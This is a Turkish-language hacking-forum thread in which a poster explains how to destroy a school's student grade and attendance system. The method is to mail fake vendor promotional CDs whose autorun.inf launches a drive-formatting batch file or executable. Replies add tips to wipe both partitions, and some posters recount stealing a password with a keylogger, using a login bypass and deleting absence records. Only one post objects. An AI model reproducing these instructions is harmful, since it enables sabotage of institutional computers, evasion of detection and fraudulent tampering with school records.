folder Tahribat.com Forumları
linefolder İş - Güç, E-Ticaret, Alışveriş
linefolder Leaaa! Karnenizi Düzeltin, Okul Minnet Duysun Size..

Leaaa! Karnenizi Düzeltin, Okul Minnet Duysun Size..

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    LYCRa
    LYCRa's avatar
    Erkek
    Liseli arkdşlar yediğim bi boku anlatayım, götü yiyen varsa yapsın.. Bu olay okul öğrenci bilgi sistemlerini uçurmaya yöneliktir. Yani devamsızlıkta notta gidicek.. Tabi taşaklı bi bilgi sistemi varsa bilemem ama 4 sene önce bizde yedek medek alınmıyodu..

Anlatayım..
    Şimdi önce okulda bilgi sisteminin yüklü olduğu 2 tane bilgisayar oldugunu biliyordum ve network ağları farklıydı bunların. Ondan labdan falan erişemioduk.. Neyse ben de farklı bi yöntem deniyim dedim Kevin Mitnick gibi.. Arkdşlar önce araştırın hangi bilgisayarlara yüklü bilgi sistemleri.. Bilgisayar sayısına göre gidin noname cd alın. (Ha bu arada ben milletten bayağı bi para toplamıştım böle yapıjam die, marlboro ya gitmişti paralar, deli para çıkıo meraklanmayın) Neyse sonra gidin süslemecilere, reklamcılara üstüne bir şirket ismi yazdırın. (Neden mi? Şöle düşünün bir eğitim otomasyonları hazırlayan şirketsiniz ve bu okula denemeleri için otomasyon sistemimizi tanıtım CDsi yolluyoruz okulun yemesi için. benim şirketin adı OPAŞtı.) Neyseee şirket adını yazdırıyosunuz, böyle basılı CDler gibi.. DİKKAT!! Adınız çıkmışsa sakın parmak izi bulundurmayın!
    2. si gidin göze hitap eden bilisayar sayısı kadar zarf alın..
    3. Gidin eve ya da cafeye bilgisayara format çeken *.bat uzantılı kodlar hazırlayın. Şimdi bu ne demek.. Dedim ya biz tanıtım için CD yolluyoruz okula.. Şimdi CDlerde Autorun olayı var, yani CDyi bilgisayara takınca siz format çektireceksiniz ama dua edin koruyucu programlar ya da yedek alınmamış olsun. Bizim zamanımızda yoktu deepfreeze gibi haltlar :D
    Neyse şimdi *.txt dosyası açın ya da holyone hardformatter xp yi indirin. Eğer ben reklam yapacam diosanız *.txt dosyası açın ve deltree /yes gibi kodları yazın oraya.. Bu size kalmış. Öyle bir mantık oluşturmanız lazım ki dediğim gibi CDyi takacak hoja ve otomatik format çekilejek.. Ya da hardformatter XP ile oluşturun bişi.. Sonra autorun.inf dosyamıza şunları girmeniz yeterli..
    [autorun]
    OPEN=AUTORUN.EXE ya da AUTORUN.BAT

autorun.inf dosyası bu kadar.. Sonra hardformatter xp ile oluşturugumuz dosyayi autorun.exe diye kaydedin ve autorun.inf in yanına sallayın. Haa ben yaptım *.bat, *.exe diosanız eğer onu da aynı şekilde autorun.inf in tanıması için autorun.exe şeklinde kaydedin.. elbette autorun.exe şeklinde olajak die bi kaide yok. Kafanıza göre takılın dosya ismini ama mutlaka autorun.inf in içinde olsun dosya adı..

Neyseeeeee şimdi bunları CDlere copy yapın.. Buldugunuz bi deepfreeze yüklü bilgisyaarda deneyin bakalım çalışıo mu..

Son adım.. Edebiyatı kuvvetli olan biri bulun ve olayı durumu anlatın. Eğer götünüze güveniosanız kendiniz bir tanıtım sayfası yapacaksınız ve A4 kağıda bascaaksınız. Bunu da zarfın içine koyacaksınız. Ufak bi şirket profili.. bu şirket ne zaman kurulmuş, napmış, referanslarınız.. büyük ve güvenilir şirket oldugunuzu ispat edeceksiniz.. Ondan edebi taşağı büyük birini bulun.. Sorularınız olursa irc.tahribat.com

Hade kolay gele..
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CLK-J35
    CLK-J35's avatar
    Erkek

hımmm =]

CeLeKatireJeotuzbeş
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RooTTeR
    RooTTeR's avatar
    Erkek
    güzel ama a.q cd yi nası okula vercez..pazarlamacı kılıgına mı gırecez a.q :D
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Pic_Boy
    Pic_Boy's avatar
    Erkek
    valla ben kendim siliodum lisedeyken tum sifreleri vardi :) o islere ben bakiyodum parayla devamsizlik bile sildim mekanim mudur ve mudur yardimcisinin odasiydi . mudurun odada bi laptop bi masa ustu vardi saglam makinalar. mudur yardimcisinin odasindakide ole bide ana makina vardi o bi odanin icinde genelde ondan geciriodum devamsizliklari notlar kimse olmuodu sil babam sil :D

Akıllılar dövüşmeden önce kazanırlar, cahiller kazanmak için dövüşürler.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    LYCRa
    LYCRa's avatar
    Erkek
    RooTTeR postayla gönderiosun o dediğim şirket adıyla.. Dedim ya aq taşaklı güsel bi zarf.. O şekilde.. Ha bi de a4 kaıda demiştim yazın şirket profili falan.. Bilgisayar çıktısı olsun. O kağıdı da, CDyi de o zarfın içine koyup postalayın okula. Kaç tane bilgi sistemi varsa o kadar çok yapın demiştim. O yüzden bilgisayarlar kime aitse onların adına yollayın teker teker..
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    VisualBoy
    VisualBoy's avatar
    Erkek
    haha ben yapmıstım gecen sene :D. hatta ben le beraber 3 kisini devamsızlıgını düsürdüm. :D. 3 sene boyunca girmeyi düsündüm 4. sene yeter artık deyip daldım pc ye. bizim okul bilsa kullanıyodu ilk once pc ye proagent atarak bilsa nın şifresini çaldım. daha sonrada bir arkadas kapıda nöbet tuttu. bende indirdim hatta hatırlıyorum. kullanıcı adı ve user bolumune hiç bisey yazmamıstım. çünkü bilsa'da ctrl+b ye 2 kere basıp tamam deyince geçiyosun :D. oradan da ogrenci bazında devamsızlığa girip d ve y (ben anadolu lisesindeydim yarım gun kaçardık hep y onun simgesi) leri siler kaydederdim. devamsızlığım karnede 18 gün gorundu normalde 25 gün kaçmışım ve 25 gün rapor kullanmışım toplam 50 gün gitmemisim :D.

HolyOne'a ulasinca, bildirecegim...
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RooTTeR
    RooTTeR's avatar
    Erkek
    harpiden maynak fikir okul kapanmadan yapım su işi geçende karnem.net tekı bızım okulun sıfresini kırdıydım a.q ama korkudan ellemedim a.q benden başka pc delısı yok okulda muhakkak benden bulcaklar o.ç ları
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rbtx
    rbtx's avatar
    Erkek
    Okulların not sistemleri bilsadadadır.İhale ile kaç seneliğine aldılar bilmiyorum.Tüm notlar sistemin gereksiniminden dolayı bir bilgisayarda toplanıyo bu bilgisayardaki sürücü ikiye bölünüyor.Diğer kullanıcılar sadece öğrenci bilgilerini görebilir ve giriş yapılabilir ana makinadanda öğrenci kimlik adı altında bir programa erişilip yeni öğrenci tanımlanır.Şimdi sistemi uçuracakların dikkatine *.bat veya *.inf dosyanızı öle ayarlayınki 2 drive a birden format atsın.Şimdi bide şu olay var ihale usulü verildiği için bilsa programları böle öğrenci tanımlama not programı olarak tanıtmayın kendinizi çünkü her okul bilsa kullanmak zorunda.Her okulun bi haftalık ders saati ayarlayan programı var ona para gidiyo ona yanıyolar.Programınızın böyle bişey olduğunu söyleyin daha çekici olur.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    uchak
    uchak's avatar
    Erkek

sapıtmayın a.q. adam gibi işinizi yapsaydınız o bokun parası senin ananın babanın cebinden cıkıcak soona neden fakiriz ince şeyler ama düşünmek lazım!!!!!!!!!!

HEPİMİZ ÖLÜCEZ!!! http://www.pardus.org.tr
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    trk
    trk's avatar
    Erkek
    lan a.q haklisin ama insan hergünde gidemiyor be okula.. moralsiz oluyor falan, böyle operasyonlar arada yapmak zorunda kaliyorsun :D
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ~$
    ComputerWolf
    ComputerWolf's avatar
    Üstün Hizmet Madalyası
    Erkek
    Hayatım boyunca şiddetle karşı çıkmışımdır..okul pc lerine dalıp not düzeltme işine...nerde o çalışkan gençlik..gözlerimiz morardı çalışmaktan heyy be..mum ışığında sınava hazırlanırdık ...hatta sınavlarda kopya çekmemek için sağa sola bakmamak için  at gözlüğüyle sınava girdiğimi bilirim :))

Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
Toplam Hit: 4787 Toplam Mesaj: 17